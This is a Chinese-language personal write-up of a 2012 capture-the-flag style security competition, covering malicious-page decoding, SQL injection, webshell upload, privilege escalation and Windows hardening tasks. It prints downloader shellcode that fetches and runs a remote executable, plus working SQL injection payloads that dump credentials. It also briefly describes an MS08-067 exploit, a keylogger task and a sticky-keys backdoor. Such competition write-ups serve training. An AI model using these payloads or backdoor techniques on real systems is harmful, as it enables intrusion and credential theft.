2012年蓝盾杯信息安全竞赛小记

时间2012.12.02 9:00-14:00
1>必须用简要文字描述操作的过程，以及保存操作截图。
2>竞赛过程中参赛者不得通过任何途径连接互联网，违者取消比赛资格！
操作题包含了web安全、主机安全、恶意程序、数据库安全和安全加固等方面的攻防题目，总15道大题，共100分。
留此简单记录竞赛过程
题目简析：
1&2&3 网马解密
0×01 初级网马
var shellcode = unescape(“%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2e55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2f3a%u772f%u7777%u612e%u6870%u6361%u2e6b%u6f63%u2f6d%u7878%u6f6f%u742f%u6f62%u2e79%u7865%u0065%u0000″)
解密得到网马地址

0×02 中级网马
var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\testSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];
ShellCode="";
ShellCode=ShellCode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI";
ShellCode=ShellCode+"xkR0qJPJP3YY0fNYwLEQk0p47zpf"+"KRKJJKVe9xJKYoIoYolOoCQv";
ShellCode=ShellCode+"3VsVwLuRKwRva"+"vbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB";
ShellCode=ShellCode+"sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO";
ShellCode=ShellCode+"NuKpTRr"+"NWOVYM5m"+"qqrwSMTn"+"oeoty08JM"+"nKJMgPw2p"+"ey5MgMWQuMw";
ShellCode=ShellCode+"runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX";
ShellCode=ShellCode+"HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK";
ShellCode=ShellCode+"e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI";
ShellCode=ShellCode+"5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ";
ShellCode=ShellCode+"OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL";
ShellCode=ShellCode+"gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5";
ShellCode=ShellCode+"PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN";
ShellCode=ShellCode+"eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw";
ShellCode=ShellCode+"2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW";
ShellCode=ShellCode+"qvRHptd4RPFZVOdoRWQgrWTnRL0l3FSQ2LQeautnasPntorN0bQhFNPeT8Quopwp";
为alpha2的TYIIIIIIIIIIIIIIII加密，工具解密得到网马地址
推荐MDecoder&Freshow

0×03 高级网马
没解出来，不贴了，期待官方解答
4&5&6&7&8 Linux-PHP-Mysql-注入到上传&提权&留root后门账户
注入
http://xxoo/zcncms/?c=articles&a=show&id=9 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(username,0x5c,userpassword),15,16,17 from information_schema.COLUMNS where TABLE_NAME=0x7A636E5F7573657273 limit 2,1
得到如下回显

账户密码admin bdtboy007位置比较yd
后台：http://xxoo/zcncms/admin_login/
改包上传得到shell
Linux，反弹 www.2cto.com

2.6.18，提权脚本上了几个，没成功，时间紧张，索性没继续。
0×09

http://xxoo/test.asp存在SQL注入漏洞，通过页面中提示，查询出数据库中一个MD5加密后的32位KEY值。

mssql字符型注入
id=1’having ‘1’=’1
Group by继续
得到的信息thekey.id thekey.here thekey.isnot
没下文了
0×10
http://xxoo:81/upload.asp 页面存在上传漏洞，请上传一个可以正常访问的webshell
抓包修改目录uploa1.asp

http://192.168.2.27:81/uploa1.asp/JPG/GFtest/2-96365-ok1.jpg

0×11
下载辅助源码code.rar
http://xxoo:82/ 站点上存在SQL注入漏洞。查询到管理账户名和密码。上传一个可以正常访问webshell。
Asp注入，过滤and7种，AnD可以突破，当时没来及看题目，无细节。
0×12
下载辅助源码code.rar （其中有一个漏洞利用程序ec.html）
获取站点http://xxoo:83/ecshop/
后台管理账户/密码
上传一个可以正常访问webshell
在ec.heml 中构造注入语句：

union select 1 from
(select count(*),concat(floor(rand(0)*2),(select concat(0x3a,user_name,0x3a,email) from users limit 0,1))a from information_schema.tables group by a)b#
得到如下信息
Id为1
admintest1
test@xian.com
Password：3e69d9e576ba7fb036d9c7c38abf79e0
队友说账号貌似无效，在挖get_password.php洞，有了一些信息，时间不够，没整完，也不贴了。
0×13
扫描远程服务器1，并对扫描结果中漏洞实施攻击，通过利用漏洞创建一个用户名为test(密码：test123)。以test用户远程登录服务器1。
Nessus扫了下，MS08-067，Metaspolit得shell，创建账户test/test123。

0×14
使用计算机语言编写一个名称为hackbluedon键盘记录器，记录用户对键盘的所有操作。
（远程服务器1已经安装好VC++开发环境，也可以使用自己电脑的开发环境）
要求：将编写好的工具代码复制到服务器1桌面上并运行起来，并且呈现记录生成的文本（把自动生成记录日志为xabd.log，存放路径为C:\目录下）（填写记录本队名称日志截图）
编一个KeyLogger

0×15 安全加固
以用户administrator（密码123456）登录上服务器1。
<1>关闭登录时显示上一次用户名。
<2>创建一个密码为test123的shift后门。
<3>修改远程登录端口为12345。
<4>修改ping时的TTL值为222。
<5>创建IP安全策略：禁止ping该服务器。
<6>通过修改本地策略禁止远程用户修改注册表。
要求截图，过程
1.修改本地安全策略
Don display last user name
设置为enable

也可设置注册表
HKLM\Software\Microsoft\WindowsT\ CurrentVersion\Winlogon\Dont-DisplayLastUserName”，把REG_SZ的键值改成1。
2.shift后门
要求密码test123，没外网，手头也没，只好用作自解压文件1.exe
密码为test123
自解压后执行cmd.exe
利用meterpreter上传到服务器，替换shift

3.修改登陆端口
修改注册表
HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WDS/RDPWD/TDS/TCP
HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WINSTATIONS/RDP-TCP/
修改PortNumber为12345

4.修改ttl为222
修改注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

5.创建ip策略，创建规则
可参考http://www.jb51.net/article/19479.htm
6.禁止远程修改注册表
在services.msc中启动Remote Registry
/*
结果不错，拿了一等奖
也有不少收获
蓝盾的大大搭环境也辛苦了
小生深有体会
存此记录
2012.12
*/